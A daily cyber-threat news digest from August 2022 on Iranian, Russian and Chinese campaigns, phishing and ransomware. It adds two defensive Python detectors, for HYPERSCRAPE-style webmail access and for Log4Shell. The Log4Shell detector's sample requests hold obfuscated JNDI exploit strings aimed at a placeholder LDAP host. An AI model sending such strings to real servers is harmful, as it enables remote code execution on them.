Wednesday, Aug 31, 2022 // (IG): BB //Sponsor: ShadowNews
US Navy says Iran seized American sea drone in Persian Gulf, tried to tow it away
FROM THE MEDIA: Iran's paramilitary Revolutionary Guard seized an American sea drone in the Persian Gulf and tried to tow it away, only releasing the unmanned vessel when a US Navy warship and helicopter approached, officials said Tuesday. It was the first time Iran targeted the Navy's Mideast-based 5th Fleet's new drone task force. While the interception ended without incident, tensions remain high between Washington and Tehran as negotiations over the Islamic Republic's tattered nuclear deal with world powers hang in the balance.
READ THE STORY: News 9 Live
Charming Kitten (APT35) scrapes email account data
FROM THE MEDIA: Researchers at Google's Threat Analysis Group (TAG) have published a report on a new tool dubbed "HYPERSCRAPE" that is being used by the Iranian threat actor Charming Kitten (APT35) to steal data from Gmail, Yahoo, and Microsoft Outlook accounts. Since 2020, the tool has been "deployed against fewer than two dozen accounts located in Iran": "HYPERSCRAPE requires the victim's account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired. It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail." The practical point is that the tool does not break authentication; it rides on a session or password that has already been stolen, so the defensive signal is webmail access from an unexpectedly old browser, not a trail of failed logins.
READ THE STORY: The CyberWire
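The behaviour TAG describes (a stolen session used from a user agent that claims to be an outdated browser, requesting Gmail's basic HTML view) is something a proxy log can surface. The script below is an added example, not code from TAG's report or from HYPERSCRAPE itself. The log lines, user names and user-agent strings are constructed for the example; the version floors in MIN_MAJOR and the use of Gmail's ui=html query parameter as the basic-view marker are assumptions you should check against your own fleet and traffic.

```python
import re
from dataclasses import dataclass, field

# Webmail hosts worth watching.  Constructed list for the example.
WEBMAIL_HOSTS = {"mail.google.com", "outlook.live.com", "outlook.office.com", "mail.yahoo.com"}

# Oldest browser major version expected from a patched fleet in August 2022.
# Assumed floors for this example (Firefox 91 ESR, Chrome 100), not values from TAG's report.
MIN_MAJOR = {"Firefox": 91, "Chrome": 100}

# Constructed proxy log: timestamp user host path "user-agent".  None of these are real sessions.
SAMPLE_LOG = """\
2022-08-30T09:12:01Z alice mail.google.com /mail/u/0/?ui=html&zy=h "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0"
2022-08-30T09:12:05Z alice mail.google.com /mail/u/0/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
2022-08-30T09:13:40Z bob   mail.google.com /mail/u/0/?ui=html "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0"
2022-08-30T09:14:02Z carol outlook.live.com /mail/0/inbox "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36"
"""

LOG_RE = re.compile(r'^(?P<ts>\S+)\s+(?P<user>\S+)\s+(?P<host>\S+)\s+(?P<path>\S+)\s+"(?P<ua>[^"]*)"$')
# Firefox UAs never contain "Chrome/", and Chrome-family UAs (Chrome, Edge, Brave) always do,
# so the first match is the engine family we want to version-check.
BROWSER_RE = re.compile(r"(Firefox|Chrome)/(\d+)")


@dataclass
class Finding:
    user: str
    host: str
    ua: str
    tags: list = field(default_factory=list)


def outdated_browser(ua):
    """Return (family, major) when the UA claims a browser below MIN_MAJOR, else None."""
    m = BROWSER_RE.search(ua)
    if not m:
        return None
    family, major = m.group(1), int(m.group(2))
    return (family, major) if major < MIN_MAJOR[family] else None


def scan(log_text):
    """Tag webmail requests: outdated UA, Gmail basic-HTML view, and both together."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["host"] not in WEBMAIL_HOSTS:
            continue
        tags = []
        old = outdated_browser(m["ua"])
        if old:
            tags.append("outdated-ua:%s/%d" % old)
        # ui=html is the query parameter Gmail uses to select its basic HTML view (assumption).
        if re.search(r"[?&]ui=html\b", m["path"]):
            tags.append("basic-html-view")
        if old and "basic-html-view" in tags:
            # Old browser plus basic view on one session is the combination TAG describes.
            tags.append("hyperscrape-like")
        if tags:
            findings.append(Finding(m["user"], m["host"], m["ua"], tags))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.user, f.host, ",".join(f.tags))
```

Only alice's first request gets the combined tag: bob uses the basic view from a current Firefox (a legitimate preference), and carol's old Chrome on Outlook is worth a look but is not the Gmail-specific pattern. A second signal worth joining to this one is the session's source IP differing from the user's usual locations, since HYPERSCRAPE runs on the attacker's machine with the victim's cookies or password.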
MuddyWater exploits Log4Shell
FROM THE MEDIA: Microsoft warns that the Iranian APT MERCURY (also known as MuddyWater) is exploiting Log4Shell (CVE-2021-44228) in vulnerable SysAid Server instances belonging to Israeli organizations: "On July 23 and 25, 2022, MERCURY was observed using exploits against vulnerable SysAid Server instances as its initial access vector. Based on observations from past campaigns and vulnerabilities found in target environments, Microsoft assesses that the exploits used were most likely related to Log4j 2."
READ THE STORY: The CyberWire
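Log4Shell exploitation leaves the JNDI lookup string in whatever the vulnerable application logged (a User-Agent, an API version header, a login field), usually wrapped in the nested-lookup obfuscation that defeats a naive grep for "${jndi:". The detector below is an added example, not Microsoft's or SysAid's code; the request lines are constructed, the IP is a documentation address, and the scheme list is limited to the protocols Log4j 2 will dereference.

```python
import re

# Constructed request lines (headers flattened to key="value"); the IP is a documentation
# address (RFC 5737) and no line here comes from a real SysAid or Microsoft dataset.
SAMPLE_REQUESTS = [
    'GET /api/v1/health HTTP/1.1 UA="Mozilla/5.0"',
    'POST /login HTTP/1.1 UA="${jndi:ldap://198.51.100.7:1389/a}"',
    'GET / HTTP/1.1 UA="${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    'GET / HTTP/1.1 X-Api-Version="${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.7/a}"',
    'GET / HTTP/1.1 UA="${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://198.51.100.7/x}"',
]

# Innermost ${...}: a lookup whose body contains no further $, { or }.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with one of the URL schemes Log4j 2 will actually dereference.
JNDI = re.compile(r"\$\{\s*jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://([^}/]+)", re.IGNORECASE)


def resolve(body):
    """Evaluate one innermost lookup the way Log4j 2 would, or None if we cannot."""
    # ${anything:-default}: the lookup fails (env:NaN, empty name) and the default is used.
    if ":-" in body:
        return body.split(":-", 1)[1]
    kind, _, value = body.partition(":")
    if kind.lower() == "lower":
        return value.lower()
    if kind.lower() == "upper":
        return value.upper()
    return None


def normalize(text, max_rounds=20):
    """Collapse nested obfuscation from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            out = resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = INNER.sub(sub, text)
        if not changed:
            break
    return text


def detect(line):
    """Return (scheme, host, obfuscated) for a JNDI lookup in the line, else None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    return m.group(1).lower(), m.group(2), norm != line


def scan(lines):
    """(line index, scheme, host, obfuscated) for every request carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        hit = detect(line)
        if hit:
            hits.append((i,) + hit)
    return hits


if __name__ == "__main__":
    for i, scheme, host, obf in scan(SAMPLE_REQUESTS):
        print(f"line {i}: {scheme}://{host}  obfuscated={obf}")
```

The host extracted from each hit is the attacker's LDAP/RMI listener and is the pivot for hunting: any outbound connection from the SysAid server to that address on the port in the lookup means the exploit fired, not merely that it was attempted. The normaliser handles the lower/upper and default-value tricks seen in the samples; Log4j's lookup grammar has more (date, sys, main), so treat any ${ in an inbound header as suspicious on its own, and remember that detection confirms exposure but only patching the Log4j 2 library under SysAid removes it.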
Russian hackers gain powerful ‘MagicWeb’ authentication bypass
FROM THE MEDIA: Nobelium, a highly active Russian threat actor, has a new technique for bypassing authentication, according to Microsoft. The group behind the 2020 SolarWinds supply chain attack has built a capability that lets it keep a firm position on a corporate network even as IT and security teams try to shut down the attack. Microsoft has dubbed the technique MagicWeb. One notable difference is that the group is not using a supply chain attack to deploy it; instead it abuses stolen admin credentials. MagicWeb is a malicious DLL loaded by an Active Directory Federation Services (AD FS) server, which is why it needs administrative access to that server in the first place, and once loaded it lets the actor authenticate as any user of the federation. The practical consequence is that resetting individual user passwords does not evict the actor; the AD FS servers themselves have to be treated as Tier 0 assets and their loaded modules verified.
READ THE STORY: OODALOOP
Chinese hackers TA423/Red Ladon target energy firms in South China Sea, Asia-Pacific
FROM THE MEDIA: Cyber-security researchers on Tuesday said they discovered a recent cyber espionage campaign targeting energy and manufacturing firms globally, including in the South China Sea, that was perpetrated by Chinese hackers. The targets of this cyber attack spanned Australia, Malaysia, and Europe, as well as entities that operate in the South China Sea, according to US-based cyber-security firm Proofpoint and PwC Threat Intelligence. "TA423/Red Ladon is a China-based, espionage-motivated threat actor that has been active since 2013, targeting a variety of organisations in response to political events in the Asia-Pacific region, with a focus on the South China Sea," the company said in a blog post.
READ THE STORY: Times Now News // ThreatPost // THN
Russian hackers blamed for ongoing Montenegro cyberattack
FROM THE MEDIA: Montenegro issued a warning over a massive ongoing cyberattack against government services and key public infrastructure including power plants and water supplies. Officials are putting the blame on Russian state-backed hackers, who have been targeting Ukraine’s allies since the invasion earlier this year. The Montenegrin Agency for National Security (ANB) said the country had been caught up in a “hybrid war”, with Russia using state-backed hackers to bring down infrastructure.
READ THE STORY: Techmonitor
Russian streaming platform confirms data breach affecting 7.5M users
FROM THE MEDIA: Russian media streaming platform ‘START’ (start.ru) has confirmed rumors of a data breach impacting millions of users. The platform’s administrators shared that network intruders managed to steal a 2021 database from its systems and are now distributing samples online. The stolen database contains email addresses, phone numbers, and usernames. START characterizes it as uninteresting to most cybercriminals as it can’t be used for taking over accounts.
READ THE STORY: Bleeping Computer
Ransomware group blurs lines between crime, state-sponsored activities, HHS alert warns
FROM THE MEDIA: The Department of Health and Human Services Cybersecurity Coordination Center warns “Evil Corp should be considered a significant threat to the U.S. health sector.” An HC3 alert details the ongoing risk posed by the highly capable cybercrime syndicate based out of Russia. “It’s entirely plausible Evil Corp could be tasked with acquiring intellectual property from the U.S. health sector” using data exfiltration cyberattacks “at the behest of the Russian government,” according to the alert.
READ THE STORY: SCMAG
DARPA Moves Forward With Project To Revolutionize Satellite Communication
FROM THE MEDIA: The U.S. Defense Advanced Research Projects Agency (DARPA), best known for creating the internet, advanced its plan to revolutionize communication among low orbiting satellite networks by selecting 11 teams to work on its Space-Based Adaptive Communications Node program.
Known as Space-BACN, the project seeks to create a low-cost, reconfigurable optical communications terminal that adapts to most optical intersatellite link standards, translating between diverse satellite constellations.
READ THE STORY: The First Newspaper
Renewable energy is maligned by misinformation. It’s a distraction, experts say
FROM THE MEDIA: You can generally trust that when you flip a light switch in the U.S., the power will come on. But earlier this year, a forecast by the North American Electric Reliability Corporation (NERC) predicted much of the country could see blackouts during peak summer demand, when everyone is blasting their air-conditioners. While major outages haven't happened so far, GOP elected officials and fossil fuel supporters still used the report to bash the shift to renewable power.
READ THE STORY: WOUB
US says Russia receives Iranian combat drones, many faulty
FROM THE MEDIA: Russia has begun receiving Iranian combat drones to be used in the Ukraine war, but many of them have already proven faulty, the US military said on Tuesday (Aug 30). "Russian transport aircraft loaded the UAV equipment at an airfield in Iran and subsequently flew from Iran to Russia over several days in August," said Pentagon spokesman Brigadier General Pat Ryder, using the initials for unmanned aerial vehicle. "It's likely part of Russia's plans to import hundreds of Iranian UAVs of various types," he said.
READ THE STORY: CNA
Why Ethiopia has moved from banning crypto to regulating it
FROM THE MEDIA: In June this year, Ethiopia’s central bank issued a statement saying that crypto business in the country is illegal. Less than three months later, the country seems to have reversed this decision, instead requiring cryptocurrency operators to register with the national cybersecurity agency—the Information Network Security Administration (INSA)—within 10 days.
READ THE STORY: QZ
Taiwan to Destroy Chinese Drones
FROM THE MEDIA: The video above has gone viral, depicting Taiwanese soldiers throwing rocks at drones believed to be sent by China. Reports are circulating that Taiwan also allowed store-bought civilian drones to enter its airspace, which leaves many to wonder how they can compete against China’s military surveillance. Backed by the US, Taiwan is beginning to push back against China and its One China policy. The Ministry of National Defense (MND) has reported that they will begin to shoot down Chinese drones or unmanned aerial vehicles (UAVs).
READ THE STORY: Armstrong Economics
Ransomware, nation-state attacks top Federal Reserve’s IT security concerns for banks
FROM THE MEDIA: The Federal Reserve Board, aka the Fed, published its annual “Cybersecurity and Financial System Resilience” report earlier this month. Not surprisingly, ransomware attacks, nation-state incursions and third-party access topped the list of potential IT security threats to the U.S. financial industry. With an eye to keeping the country’s financial industry as stable as possible, the Fed report looks at the potential influences that could rock the monetary boat.
READ THE STORY: SCMAG
Three campaigns delivering multiple malware, including ModernLoader and XMRig miner
FROM THE MEDIA: Cisco Talos researchers observed three separate, but related, campaigns between March and June 2022 that were delivering multiple malware, including the ModernLoader bot (aka Avatar bot), RedLine info-stealer and cryptocurrency miners to victims. ModernLoader is a .NET remote access trojan that supports multiple features, including the capability of gathering system information, executing arbitrary commands, or downloading and running a file from the C2 server.
READ THE STORY: Security Affairs
Okta entangled by Twilio phishing attack
FROM THE MEDIA: The phishing attack against Twilio continues to unravel, as more victims are discovered and come forward with details about various levels of exposure. The incident bears the markings of a persistent and sophisticated campaign that engulfed IT service providers, which can lead the threat actor to additional downstream targets. The threat actor exploited usernames and passwords stolen in previous phishing campaigns to trigger text-message authentication processes, and used its access to Twilio’s systems to search for one-time passwords sent as a result of those two-factor authentication requests, according to Okta.
READ THE STORY: CyberSecurityDive
IAM house Okta confirms 0ktapus/Scatter Swine attack
FROM THE MEDIA: Identity and access management specialist Okta has warned customers to be on their guard against a widespread and impactful phishing campaign that has already hit a very limited number of its customers. This comes after researchers at Group-IB gathered evidence that tied together multiple recent incidents, including an attack on Twilio, in a criminal campaign that seems to have heavily exploited the Okta brand, and the trust its customers hold in it, in order to compromise its targets.
READ THE STORY: ComputerWeekly
Hackers hide malware in James Webb telescope images
FROM THE MEDIA: Threat analysts have spotted a new malware campaign dubbed ‘GO#WEBBFUSCATOR’ that relies on phishing emails, malicious documents, and space images from the James Webb telescope to spread malware. The malware is written in Golang, a programming language that is gaining popularity among cybercriminals because it is cross-platform (Windows, Linux, Mac) and offers increased resistance to reverse engineering and analysis. In the recent campaign discovered by researchers at Securonix, the threat actor drops payloads that are currently not marked as malicious by antivirus engines on the VirusTotal scanning platform.
READ THE STORY: Bleeping Computer
Emerging Potential of Quantum Computing
FROM THE MEDIA: With rapid advancements in digital engineering and data architecture, we require powerful computational models. Traditional computational models, built on binary 1s and 0s, lack the computational power to sort the exorbitant amounts of data that today's complex digital technologies produce. Imagine you must distribute test sheets among students. You may be able to distribute 100 sheets per minute. As the number of students grows, the time to distribute the sheets grows with it.
READ THE STORY: Modern Diplomacy
Security Researcher Finds That TikTok Browser Is Tracking Keystrokes
FROM THE MEDIA: A security researcher has raised alarms about the TikTok browser embedded in the popular app, presenting evidence that it is capable of tracking keystrokes. The company responded to the report by confirming that the ability exists within the app’s code, but that it is not active and that it is only used internally for debugging and testing purposes. Security researcher Felix Krause, a former Google engineer, notes that even having this ability present in an app is highly unusual and something that is usually only done by malware and spyware.
READ THE STORY: CPO
Microsoft Excel attacks fall out of fashion with hackers
FROM THE MEDIA: Cybercriminals are turning away from Microsoft Excel as a method for sneaking malware onto the PCs of potential victims. Security vendor Hornetsecurity said its researchers logged a significant drop over July in the volume of malware-laden emails that relied on malicious Excel documents. The company's monthly email threat report noted that from June to the end of July, Excel attacks plummeted by nearly 10 percentage points.
READ THE STORY: Techtarget
FBI warns about cyber criminals exploiting DeFi vulnerabilities
FROM THE MEDIA: Vulnerabilities in decentralized finance (DeFi) platforms are being exploited by cybercriminals to steal cryptocurrency, the Federal Bureau of Investigation warned Monday. DeFi platforms generally rely on smart contracts, which are automated agreements that lack an intermediary, like a broker. However, that has left many platforms, and the assets investors entrust to them, at risk. "Cyber criminals seek to take advantage of investors' increased interest in cryptocurrencies, as well as the complexity of cross-chain functionality and open source nature of DeFi platforms," the agency warned in a public service announcement.
READ THE STORY: The Record
Computer attack on SERNAC: Experts confirm ransomware has already been used in Canada and the Netherlands
FROM THE MEDIA: The computer attack that has hit Chile's National Consumer Service (SERNAC) since last Thursday, and has prompted warnings from the government's special technical unit to all state agencies, worries the public. Experts point to similarities between this attack and others reported in recent months. According to Kronup Cyber Security's director of operations, Germán Fernández, the case involves a new type of ransomware, of which only two previous records exist, and which can be linked to the person or persons responsible for bringing down the entire online platform of the pro-consumer agency.
READ THE STORY: Nation World News
How safe is your drinking water
FROM THE MEDIA: When it comes to cybersecurity of our essential infrastructure in the United States, things may not be as bad as you think. The truth is that they are far worse. On Aug. 15, a water department plant in the UK that provides water to 200,000 consumers was the victim of a ransomware cyberattack in which the hackers indicated that they also had obtained access to the computer software that controls the chemicals in the water. In its ransom demand, the hackers said “if you are shocked it is good” and in that they are correct.
READ THE STORY: The Hill
Breaches You Don’t Hear About
FROM THE MEDIA: I think it’s fair to say that, over the decades, if the general public had been alerted to all the attempted terrorist attacks tracked down and prevented by intelligence – as opposed to just the ones they know about – they might be a little edgy. It’s exactly the same with cybersecurity breaches. I tuned into a Cato Networks presentation along the lines of “three breaches you didn’t know about” via LinkedIn in my case, but here’s the generic link.
READ THE STORY: Computer Weekly
If America refuses to lead globalization, China will
FROM THE MEDIA: After World War II, the IMF was established to maintain fixed exchange rates to enable commerce and short-circuit a repeat of the competitive currency devaluations of the 1930s. Since the advent of market-determined exchange rates, it has proven useless to resolve the complaints about governments suppressing currency values to gain competitive advantages. China’s Belt and Road and European and American responses are weaponizing development finance, and the World Bank can do little about it.
READ THE STORY: Washington Times
NATO Investigates Dark Web Leak of Data Stolen From Missile Vendor
FROM THE MEDIA: NATO is reportedly investigating a data leak that affected a European missile systems firm. Hackers have put data stolen from the firm up for sale on the dark web, including blueprints of weapons currently used by Ukraine in the war with Russia. The company, MBDA Missile Systems, is headquartered in France and sells weapons to several NATO countries. The company has acknowledged that the data for sale does belong to it. The attack appears to have been a ransomware attack; however, the data was acquired from a compromised external hard drive rather than from the company's internal networks.
READ THE STORY: OODALOOP
Organizations are spending billions on malware defense that’s easy to bypass
FROM THE MEDIA: Last year, organizations spent $2 billion on products that provide Endpoint Detection and Response, a relatively new type of security protection for detecting and blocking malware targeting network-connected devices. EDRs, as they're commonly called, represent a newer approach to malware detection. Static analysis, one of two more traditional methods, searches for suspicious signs in the DNA of a file itself. Dynamic analysis, the other more established method, runs untrusted code inside a secured "sandbox" to analyze what it does to confirm it's safe before allowing it to have full system access.
READ THE STORY: Arstechnica
Receipt for €8M iOS Zero-Day Sale Pops Up on Dark Web
FROM THE MEDIA: Security researchers have identified screenshots of a transaction between an unknown customer and Intellexa, a spyware company, in which the buyer paid €8 million for access to a full-service zero-day remote code execution exploit. The transaction shows the zero-day exploit, referred to as Nova Suite, being sold to the unknown buyer. The bill is dated July 14, and Nova Suite promises many capabilities and turnkey infections for both Android and iOS devices. The paperwork references the outdated iOS version 15.4.1 from March; however, it is not apparent how many devices are still vulnerable to the exploit.
READ THE STORY: OODALOOP
Items of interest
Drones Are Changing Battlefields
FROM THE MEDIA: Not a day goes by that Ukraine does not issue a military statement bragging about its surgical strikes against Russian military targets.
Six months after Russia’s invasion of Ukraine, one weapon that has proved critical and has given Ukrainian forces the edge on the battlefield by stopping long Russian tank columns in their place is the unmanned aerial vehicle (UAV).
UAVs, or drones, are playing a key role in Ukraine's counteroffensives against Russia's assault, and their success is so striking that Ukrainian forces are singing their praises, literally.
A Ukrainian song went viral in April when Turkish drones operated by Ukrainian forces inflicted major damage on Russian tanks.
The lyrics go like this: “Bayraktar will change your mind.”
The Bayraktar, the Turkish-made weapon that Ukrainian officials are touting, is one of the most effective in Ukraine’s arsenal that has played a part in slowing down the Russian advance.
The Bayraktar TB2 is small enough to be moved around on a flatbed truck, making it hard to detect and giving it the ability to be launched from almost anywhere.
READ THE STORY: The Media Line
YouTubers are getting HACKED (Video)
FROM THE MEDIA: Hackers are trying to take over YouTube channels. BUT they made a mistake in going after the best hacking YouTuber, John Hammond. In this video, John Hammond breaks down the hacking attempt on his channel and how the hackers will try to steal your credentials and take over your YouTube channel.
Warning! Python Remote Keylogger (this is really too easy!) (Video)
FROM THE MEDIA: A Python program that saves keystrokes to a cloud server. I compiled the script to run on a Windows 11 computer with anti-virus enabled. May this be a warning to both you and your family. Don't download software that you don't trust. Only download software from reputable software developers and those you trust.
These open source products are reviewed by analysts at InfoDom Securities and provide possible context about current media trends in the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com